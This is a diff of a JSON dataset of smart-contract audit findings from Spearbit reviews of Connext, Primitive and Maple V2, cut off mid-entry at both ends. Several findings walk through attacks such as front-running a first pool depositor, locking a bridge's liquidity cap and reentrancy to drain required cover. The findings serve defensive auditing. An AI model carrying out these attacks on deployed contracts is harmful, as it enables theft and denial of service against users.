BridgeFacet__addRemote_invalidDomain(); } s.remotes[_domain] = _router; emit RemoteAdded(_domain, TypeCasts.bytes32ToAddress(_router), msg.sender); } Instance 3 - TokenFacet._enrollAdoptedAndLocalAssets The _enrollAdoptedAndLocalAssets function of TokenFacet.sol does not check that the _canonical.domain and _canonical.id are not zero before adding them. function _enrollAdoptedAndLocalAssets( address _adopted, address _local, address _stableSwapPool, TokenId calldata _canonical ) internal returns (bytes32 _key) { // Get the key _key = AssetLogic.calculateCanonicalHash(_canonical.id, _canonical.domain); // Get true adopted address adopted = _adopted == address(0) ? _local : _adopted; // Sanity check: needs approval if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); // Update approved assets mapping s.approvedAssets[_key] = true; // Update the adopted mapping using convention of local == adopted iff (_adooted == address(0)) s.adoptedToCanonical[adopted].domain = _canonical.domain; s.adoptedToCanonical[adopted].id = _canonical.id; These two values are used for generating the key to determine if a particular asset has been approved. Additionally, zero value is treated as a null check within the AssetLogic.getCanonicalTokenId function: // Check to see if candidate is an adopted asset. _canonical = s.adoptedToCanonical[_candidate]; if (_canonical.domain != 0) { // Candidate is an adopted asset, return canonical info. return _canonical; }", + "title": "Bisection always uses max iterations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The current bisection algorithm chooses the mid point as root = (lower + upper) / 2; and the bisection terminates if either upper - lower < 0 or maxIterations is reached. Given upper >= lower throughout the code, it's easy to see that upper - lower < 0 can never be satisfied. The bisection will always use the max iterations. However, even with an epsilon of 1 it can happen that the mid point root is the same as the lower bound if upper = lower + 1. The if (output * lowerOutput < 0) condition will never be satisfied and the else case will always run, setting the lower bound to itself. The bisection will keep iterating with the same lower and upper bounds until max iterations are reached.", "labels": [ "Spearbit", - "ConnextNxtp", + "Primitive", "Severity: Low Risk" ] }, { - "title": "When initializing Connext bridge make sure _xAppConnectionManager domain matches the one pro- vided to the initialization function for the bridgee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The only contract that implements IConnectorManager fully is SpokeConnector (through inheriting ConnectorManager and overriding localDomain): 45 // File: SpokeConnector.sol function localDomain() external view override returns (uint32) { return DOMAIN; } So a SpokeConnector or a IConnectorManager has its own concept of the local domain (the domain that it lives / is deployed on). And this domain is used when we are hashing messages and inserting them into the SpokeCon- nector's merkle tree: // File: SpokeConnector.sol bytes memory _message = Message.formatMessage( DOMAIN, bytes32(uint256(uint160(msg.sender))), _nonce, _destinationDomain, _recipientAddress, _messageBody ); // Insert the hashed message into the Merkle tree. bytes32 _messageHash = keccak256(_message); // Returns the root calculated after insertion of message, needed for events for // watchers (bytes32 _root, uint256 _count) = MERKLE.insert(_messageHash); We need to make sure that this local domain matches the _domain provided to this init function. Otherwise, the message hashes that are inserted into SpokeConnector's merkle tree would have 2 different origin domains linked to them. One from SpokeConnector in this message hash and one from connext's s.domain = _domain which is used in calculating the transfer id hash. The same issue applies to setXAppConnectionManager.", + "title": "Potential reentrancy in claimFees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The contract performs all transfers in the _settlement function and therefore _settlement can call- back to the user for reentrant tokens. To avoid reentrancy issues the _preLock() modifier implements a reentrancy check, but only if the called action is not happening during a multicall execution: function _preLock() private { // Reverts if the lock was already set and the current call is not a multicall. if (_locked != 1 && !_currentMulticall) { revert InvalidReentrancy(); } _locked = 2; } Therefore, multicalls are not protected against reentrancy and _settlement should never be executed, only once at the end of the original multicall function. However, the claimFee function can be called through a multicall by the protocol owner and it calls _settlement even if the execution is part of a multicall.", "labels": [ "Spearbit", - "ConnextNxtp", + "Primitive", "Severity: Low Risk" ] }, { - "title": "The stable swap pools used in Connext are incompatible with tokens with varying decimals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The stable swap functionality used in Connext calculates and stores for each token in a pool, the token's precision relative to the pool's precision. The token precision calculation uses the token's decimals. And since this precision is only set once, for a token that can have its decimals changed at a later time in the future, the precision used might not be always accurate in the future. And so in the event of a token decimal change, the swap calculations involving this token would be inaccurate. For exmpale in _xp(...): function _xp(uint256[] memory balances, uint256[] memory precisionMultipliers) internal pure returns (uint256[] memory) uint256 numTokens = balances.length; require(numTokens == precisionMultipliers.length, \"mismatch multipliers\"); uint256[] memory xp = new uint256[]numTokens; for (uint256 i; i < numTokens; ) { xp[i] = balances[i] * precisionMultipliers[i]; unchecked { ++i; } } return xp; { } We are multiplying in xp[i] = balances[i] * precisionMultipliers[i]; and cannot use division for tokens that have higher precision than the pool's default precision.", + "title": "Bisection can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The Bisection algorithm tries to find a root of the monotonic function. Evaluating the expensive invariant function at the lower point on each iteration can be avoided by caching the output function value whenever a new lower bound is set.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "When Connext reaches the cap allowed custodied, race conditions can be created", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "When IERC20(local).balanceOf(address(this)) is close to s.caps[key] (this can be relative/subjective) for a canonical token on its canonical domain, a race condition gets created where users might try to frontrun each others calls to xcall or xcallIntoLocal to be included in a cross chain transfer. This race condition is actually between all users and all liquidity routers. Since there is a same type of check when routers try to add liquidity. uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); }", + "title": "Pool existence check in swap should happen earlier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The swap function makes use of the pool pair's tokens to scale the input decimals before it checks if the pool even exists.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Prevent sequencers from signing multiple routes for the same cross-chain transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Liquidity routers only sign the hash of (transferId, pathLength) combo. This means that each router does not have a say in: 1. The ordering of routers provided/signed by the sequencer. 2. What other routers are used in the sequence. If a sequencer signs 2 different routes (set of routers) for a cross-chain transfer, a relayer can decide which set of routers to use and provide to BridgeFacet.execute to make sure the liquidity from a specific set of routers' balances is used (also the same possibility if 2 different sequencers sign 2 different routes for a cross-chain transfer).", + "title": "Pool creation in test uses wrong duration and volatility", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The second path with pairId != 0 in HelperConfigsLib's pool creation calls the createPool method with the volatility and duration parameters swapped, leading to wrong pool creations used in tests that use this path.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Well-funded malicious actors can DOS the bridge", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A malicious actor (e.g. a well-funded cross-chain messaging competitor) can DOS the bridge cheaply. Assume Ethereum <-> Polygon bridge and the liquidity cap is set to 1m for USDC. 1. Using a slow transfer to avoid router liquidity fees, Bob (attacker) transferred 1m USDC from Ethereum to Polygon. 1m USDC will be locked on Connext's Bridge. Since the liquidity cap for USDC is filled, no one will be able to transfer any USDC from Ethereum to Polygon unless someone transfers POS-USDC from Polygon to Ethereum to reduce the amount of USDC held by the bridge. 2. On the destination chain, nextUSDC (local bridge asset) will be swapped to POS-USDC (adopted asset). The swap will incur low slippage because it is a stablewap. Assume that Bob will receive 999,900 POS-USDC back on Polygon. A few hundred or thousand loss is probably nothing for a determined competitor that wants to harm the reputation of Connext. 3. Bob bridged back the 999,900 POS-USDC using Polygon's Native POS bridge. Bob will receive 999,900 USDC in his wallet in Ethereum after 30 minutes. It is a 1-1 exchange using a native bridge, so no loss is incurred here. 4. Whenever the liquidity cap for USDC gets reduced on Connext's Bridge, Bob will repeat the same trick to keep the bridge in an locked state. 5. If Bob is well-funded enough, he could perform this against all Connext's bridges linked to other chains for popular assets (e.g. USDC), and normal users will have issues transferring popular assets when using xcall.", + "title": "First pool depositor can be front-run and have part of their deposit stolen", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The first deposit with a totalSupply of zero shares will mint shares equal to the deposited amount. This makes it possible to deposit the smallest unit of a token and profit off a rounding issue in the computation for the minted shares of the next depositor: (shares_ * totalAssets()) / totalSupply_ Example: The first depositor (victim) wants to deposit 2M USDC (2e12) and submits the transaction. The attacker front runs the victim's transaction by calling deposit(1) to get 1 share. They then transfer 1M USDC (1e12) to the contract, such that totalAssets = 1e12 + 1, totalSupply = 1. When the victim's transaction is mined, they receive 2e12 / (1e12 + 1) * totalSupply = 1 shares (rounded down from 1.9999...). The attacker withdraws their 1 share and gets 3M USDC * 1 / 2 = 1.5M USDC, making a 0.5M profit. During the migration, an _initialSupply of shares to be airdropped are already minted at initialization and are not affected by this attack.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "MapleV2.pd", + "Severity: High Risk" ] }, { - "title": "calculateTokenAmount is not checking whether amounts provided has the same length as balances", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "There is no check to make sure amounts.length == balances.length in calculateTokenAmount: function calculateTokenAmount( Swap storage self, uint256[] calldata amounts, bool deposit ) internal view returns (uint256) { uint256 a = _getAPrecise(self); uint256[] memory balances = self.balances; ... There are 2 bad cases: 49 1. amounts.length > balances.length, in this case, we have provided extra data which will be ignored silently and might cause miscalculation on or off chain. 2. amounts.length < balances.length, the loop in calculateTokenAmount would/should revert becasue of an index-out-of-bound error. In this case, we might spend more gas than necessary compared to if we had performed the check and reverted early.", + "title": "Users depositing to a pool with unrealized losses will take on the losses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The pool share price used for deposits is always the totalAssets() / totalSupply, however the pool share price when redeeming is totalAssets() - unrealizedLosses() / totalSupply. The unrealized- Losses value is increased by loan impairments (LM.impairLoan) or when starting triggering a default with a liq- uidation (LM.triggerDefault). The totalAssets are only reduced by this value when the loss is realized in LM.removeLoanImpairment or LM.finishCollateralLiquidation. This leads to a time window where deposits use a much higher share price than current redemptions and future deposits. Users depositing to the pool during this time window are almost guaranteed to make losses when they In the worst case, a Pool.deposit might even be (accidentally) front-run by a loan impairment or are realized. liquidation.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "MapleV2.pd", + "Severity: Medium Risk" ] }, { - "title": "Rearrange an expression in _calculateSwapInv to avoid underflows", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In the following expression used in SwapUtils_calculateSwapInv, if xp[tokenIndexFrom] = x + 1 the expression would underflow and revert. We can arrange the expression to avoid reverting in this edge case. dx = x - xp[tokenIndexFrom] + 1;", + "title": "TransitionLoanManager.add does not account for accrued interest since last call", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The TransitionLoanManager.add advances the domain start but the accrued interest since the last domain start is not accounted for. If add is called several times, the accounting will be wrong. It therefore wrongly tracks the _accountedInterest variable.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "MapleV2.pd", + "Severity: Medium Risk" ] }, { - "title": "The pre-image of DIAMOND_STORAGE_POSITION's storage slot is known", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The preimage of the hashed storage slot DIAMOND_STORAGE_POSITION is known.", + "title": "Unaccounted collateral is mishandled in triggerDefault", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The control flow of triggerDefault is partially determined by the value of MapleLoanLike(loan_- ).collateral() == 0. The code later assumes there are 0 collateral tokens in the loan if this value is true, which is incorrect in the case of unaccounted collateral tokens. In non-liquidating repossessions, this causes an overes- timation of the number of fundsAsset tokens repossessed, leading to a revert in the _disburseLiquidationFunds function. Anyone can trigger this revert by manually transferring 1 Wei of collateralAsset to the loan itself. In liq- uidating repossessions, a similar issue causes the code to call the liquidator's setCollateralRemaining function with only accounted collateral, meaning unaccounted collateral will be unused/stuck in the liquidator.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "MapleV2.pd", + "Severity: Medium Risk" ] }, { - "title": "The @param NatSpec comment for _key in AssetLogic._swapAsset is incorrect", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The @param NatSpec for _key indicates that this parameter is a canonical token id where instead it should mention that it is a hash of a canonical id and its corresponding domain. We need to make sure the correct value has been passed down to _swapAsset.", + "title": "Initial cycle time is wrong when queuing several config updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The initial cycle time will be wrong if there's already an upcoming config change that changes the cycle duration. Example: currentCycleId: 100 config[0] = currentConfig = {initialCycleId: 1, cycleDuration = 1 days} config[1] = {initialCycleId: 101, cycleDuration = 7 days} Now, scheduling will create a config with initialCycleId: 103 and initialCycleTime = now + 3 * 1 days, but the cycle durations for cycles (100, 101, 102) are 1 days + 7 days + 7 days.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "MapleV2.pd", + "Severity: Medium Risk" ] }, { - "title": "Malicious routers can temporarily DOS the bridge by depositing a large amount of liquidity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Both router and bridge share the same liquidity cap on the Connext bridge. Assume that the liquidity cap for USDC is 1 million on Ethereum. Shortly after the Connext Amarok launch, a router adds 1 million USDC liquidity. No one would be able to perform a xcall transfer with USDC from Ethereum to other chains as it will always revert because the liquidity cap has exceeded. The DOS is temporary because the router's liquidity on Ethereum will be reduced if there is USDC liquidity flowing in the opposite direction (e.g., From Polygon to Ethereum)", + "title": "Users cannot resubmit a withdrawal request as per the wiki", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "As per Maple's wiki: pool-v2::PoolManager.sol#371-L382, withdrawal- Refresh: The withdrawal request can be resubmitted with the same amount of shares by calling pool.requestRedeem(0). However, the current implementation prevents Pool.requestRedeem() from being called where the shares_ pa- rameter is zero.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Prevent deploying a representation token twice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function setupAsset() is protected by _enrollAdoptedAndLocalAssets() which checks s.approvedAssets[_key] to prevent accidentally setting up an asset twice. However the function _removeAssetId() is rather thorough and removes the s.approvedAssets[_key] flag. After a call to _removeAssetId(), an asset can be recreated via setupAsset(). This will deploy a second representation token which will be confusing to users of Connext. Note: The function setupAssetWithDeployedRepresentation() could be used to connect a previous presentation token again to the canonical token. Note: All these functions are authorized so it would only be a problem if mistakes are made. 51 function setupAsset(...) ... onlyOwnerOrAdmin ... { if (_canonical.domain != s.domain) { _local = _deployRepresentation(...); // deploys a new token } else { ... } bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _local, _stableSwapPool, _canonical); ... } function _enrollAdoptedAndLocalAssets(...) ... { ... if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); s.approvedAssets[_key] = true; ... } function _removeAssetId(...) ... { ... delete s.approvedAssets[_key]; ... }", + "title": "Accrued interest may be calculated on an overstated payment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The checkTotalAssets() function is a useful helper that may be used to make business decisions in the protocol. However, if there is a late loan payment, the total interest is calculated on an incorrect payment interval, causing the accrued interest to be overstated. It is also important to note that late interest will also be excluded from the total interest calculation.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Extra safety checks in _removeAssetId()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _removeAssetId() deletes assets but it doesn't check if the passed parameters are a consistent set. This allows for mistakes where the wrong values are accidentally deleted. function _removeAssetId(bytes32 _key, address _adoptedAssetId, address _representation) internal { ... delete s.adoptedToCanonical[_adoptedAssetId]; delete s.representationToCanonical[_representation]; ... }", + "title": "No deadline when liquidating a borrower's collateral", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "A loan's collateral is liquidated in the event of a late payment or if the pool delegate impairs a loan If the loan contains any amount of collateral (assuming it is different to the due to insolvency by the borrower. funds' asset), the liquidation process will attempt to sell the collateral at a discounted amount. Because a liquidation is considered active as long as there is remaining collateral in the liquidator contract, a user can knowingly liquidate all but 1 wei of collateral. As there is no incentive for others to liquidate this dust amount, it is up to the loan manager to incur the cost and responsibility of liquidating this amount before they can successfully call LoanManager.finishCollateralLiquidation().", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Data length not validated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The following functions do not validate that the input _data is 32 bytes. GnosisSpokeConnector._sendMessag GnosisSpokeConnector._processMessage BaseMultichain.sendMessage OptimismSpokeConnector._sendMessage The input _data contains the outbound Merkle root or aggregated Merkle root, which is always 32 bytes. If the root is not 32 bytes, it is invalid and should be rejected.", + "title": "Loan impairments can be unavoidably unfair for borrowers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "When a pool delegate impairs a loan, the loan's _nextPaymentDueDate will be set to the min of If the pool delegate later decides to remove the im- block.timestamp and the current _nextPaymentDueDate. pairment, the original _nextPaymentDueDate is restored to its correct value. The borrower can also remove an impairment themselves by making a payment. In this case, the _nextPaymentDueDate is not restored, which is always worse for the borrower. This can be unfair since the borrower would have to pay late interest on a loan that was never actually late (according to the original payment due date). Another related consequence is that a borrower can be liquidated before the original payment due date even passes (this is possible as long as the loan is impaired more than gracePeriod seconds away from the original due date).", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Verify timestamp reliability on L2", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Timestamp information on rollups can be less reliable than on mainnet. For instance, Arbitrum docs say: As a general rule, any timing assumptions a contract makes about block numbers and timestamps should be considered generally reliable in the longer term (i.e., on the order of at least several hours) but unreliable in the shorter term (minutes). (It so happens these are generally the same assumptions one should operate under when using block numbers directly on Ethereum!) Uniswap docs mention this for Optimism: The block.timestamp of these blocks, however, reflect the block.timestamp of the last L1 block ingested by the Sequencer.", + "title": "withdrawCover() vulnerable to reentrancy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "withdrawCover() allows for reentrancy and could be abused to withdraw below the minimum cover amount and avoid having to cover protocol insolvency through a bad liquidation or loan default. The moveFunds() function could transfer the asset amount to the recipient specified by the pool delegate. Some In this case, the pool delegate could reenter the tokens allow for callbacks before the actual transfer is made. withdrawCover() function and bypass the balance check as it is made before tokens are actually transferred. This can be repeated to empty out required cover balance from the contract. It is noted that the PoolDelegateCover contract is a protocol controlled contract, hence the low severity.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "MirrorConnector cannot be changed once set", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "For chains other than Polygon, it is allowed to change mirror connector any number of times. For Polygon chain, the _setMirrorConnector is overridden. 1. Let's take PolygonHubConnector contract example: function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } 2. Since setFxChildTunnel(PolygonHubConnector) can only be called once due to below require check, this also restricts the number of time mirror connector can be altered. function setFxChildTunnel(address _fxChildTunnel) public virtual { require(fxChildTunnel == address(0x0), \"FxBaseRootTunnel: CHILD_TUNNEL_ALREADY_SET\"); ... } 54", + "title": "Bad parameter encoding and deployment when using wrong initializers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The initializers used to encode the arguments, when deploying a new pool in PoolDeployer, might not be the initializers that the proxy factory will use for the default version and might lead to bad parameter encoding & deployments if a wrong initializer is passed.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Possible infinite loop in dequeueVerified()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The loop in function dequeueVerified() doesn't end if queue.first == queue.last == 0. In this situation, at unchecked { --last; } the following happens: last wraps to type(uint128).max. Now last is very large and is surely >=first and thus the loop keeps running. This problem can occur when queue isn't initialized. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { uint128 first = queue.first; uint128 last = queue.last; require(last >= first, \"queue empty\"); for (last; last >= first; ) { ... unchecked { --last; } // underflows when last == 0 (e.g. queue isn't initialized) } }", + "title": "Event LoanClosed might be emitted with the wrong value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "In function closeLoan function, the fees are got by the getClosingPaymentBreakdown function and it is not adding refinances fees after in code are paid all fee by payServiceFees which may include refinances fees. The event LoanClose might be emitted with the wrong fee value.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Do not ignore staticcall's return value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "TypedMemView calls several precompiles through staticcall opcode and never checks its return value assuming it is a success. For instance: TypedMemView.sol#L668-L669, TypedMemView.sol#L685-L686, // use the identity precompile to copy // guaranteed not to fail, so pop the success pop(staticcall(gas(), 4, _oldLoc, _len, _newLoc, _len)) However, there are rare cases when call to precompiles can fail. For example, when the call runs out of gas (since 63/64 of the gas is passed, the remaining execution can still have gas). Generally, not checking for success of calls is dangerous and can have unintended consequences.", + "title": "Bug in makePayment() reverts when called with small amounts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "When makePayment() is called with an amount which is less than the fees payable, then the trans- action will always revert, even if there is an adequate amount of drawable funds. The revert happens due to an underflow in getUnaccountedAmount() because the token balance is decremented on the previous line without updating drawable funds.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk TypedMemView.sol#L652," + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "Renounce wait time can be extended", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The _proposedOwnershipTimestamp updates everytime on calling proposeNewOwner with newlyPro- posed as zero address. This elongates the time when owner can be renounced.", + "title": "Pool.previewWithdraw always reverts but Pool.withdraw can succeed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The Pool.previewWithdraw => PM. previewWithdraw => WM.previewWithdraw function call se- quence always reverts in the WithdrawalManager. However, the Pool.withdraw function can succeed. This behavior might be unexpected, especially, as integrators call previewWithdraw before doing the actual withdraw call.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Extra parameter in function checker() at encodeWithSelector()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function checker() sets up the parameters to call the function sendMessage(). However, it adds an extra parameter outboundRoot, which isn't necessary. function sendMessage() external { ... } function checker() external view override returns (bool canExec, bytes memory execPayload) { ... execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); // extra parameter ... }", + "title": "Setting a new WithdrawalManager locks funds in old one", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The WithdrawalManager only accepts calls from a PoolManager. When setting a new withdrawal manager with PoolManager.setWithdrawalManager, the old one cannot be accessed anymore. Any user shares locked for withdrawal in the old one are stuck.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "MerkleLib.insert() can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "storage. Each call to MerkleLib.insert() reads the entire tree from storage, and writes 2 (tree.count and tree.branch[i]) back to storage. These storage operations can be done only once at the beginning, by loading them in memory. The updated count and branches can be written back to the storage at the end saving expensive SSTORE and SLOAD operations.", + "title": "Use whenProtocolNotPaused on migrate() instead of upgrade() for more complete protection", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "whenProtocolNotPaused is added to migrate() for the Liquidator, MapleLoan, and Withdrawal- Manager contracts in order to protect the protocol by preventing it from upgrading while the protocol is paused. However, this protection happens only during upgrade, and not during instantiation.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "EIP712 domain separator can be cached", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The domain separator can be cached for gas-optimization.", + "title": "Missing post-migration check in PoolManager.sol could result in lost funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The protocol employs an upgradeable/migrateable system that includes upgradeable initializers for factory created contracts. For the most part, a storage value that was left uninitialized due to an erroneous initializer would not be affect protocol funds. For example forgetting to initialize _locked would cause all nonReentrant functions to revert, but no funds lost. However, if the poolDelegateCover address were unset and depositCover() were called, the funds would be lost as there is no to != address(0) check in transferFrom.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "stateCommitmentChain can be made immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once assigned in constructor, stateCommitmentChain cannot be changed.", + "title": "Globals.poolDelegates[delegate_].ownedPoolManager mapping can be overwritten", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The Globals.poolDelegates[delegate_].ownedPoolManager keeps track of a single pool manager for a pool delegate. It can happen that the same pool delegate is registered for a second pool manager and the mapping is overwritten, by calling PM.acceptPendingPoolDelegate -> Globals.transferOwnedPoolManager or Globals.activatePoolManager.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "Nonce can be updated in single step", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Nonce can be incremented in single step instead of using a second step which will save some gas", + "title": "Pool withdrawals can be kept low by non-redeeming users", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "In the current pool design, users request to exit the pool and are scheduled for a withdrawal window in the withdrawal manager. If the pool does not have enough liquidity, their share on the available pool liquidity is proportionate to the total shares of all users who requested to withdraw in that withdrawal window. It's possible for griefers to keep the withdrawals artificially low by requesting a withdrawal but not actually withdraw- ing during the withdrawal window. These griefers are not penalized but their behavior leads to worse withdrawal amounts for every other honest user.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "ZkSyncSpokeConnector._sendMessage encodes unnecessary data", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Augmenting the _data with the processMessage function selector is unnecessary. Since on the mirror domain, we just need to provide the right parameters to ZkSyncHubConnector.processMessageFromRoot (which by the way anyone can call) to prove the L2 message inclusion of the merkle root _data. Thus the current implementation is wasting gas.", + "title": "_getCollateralRequiredFor should round up", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The _getCollateralRequiredFor rounds down the collateral that is required from the borrower. This benefits the borrower.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "getD can be optimized by removing an extra multiplication by d per iteration", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The calculation for the new d can be simplified by canceling a d from the numerator and denominator. Basically, we have : f (D) = 1 nn+1a Q xi Dn+1 + (1 (cid:0) 1 na )D (cid:0) X xi 59 and having/assuming n, a, xi are fixed, we are using Newton's method to find a solution for f = 0. The original implementation is using: D0 = D (cid:0) f (D) f 0(D) = which can be simplified to: (na P xi + Dn+1 nn(cid:0)1 Q xi )D (na (cid:0) 1)D + (n + 1) Dn+1 nn Q xi na P xi + D0 = Dn nn(cid:0)1 (na (cid:0) 1) + (n + 1) D Q xi Dn Q xi nn", + "title": 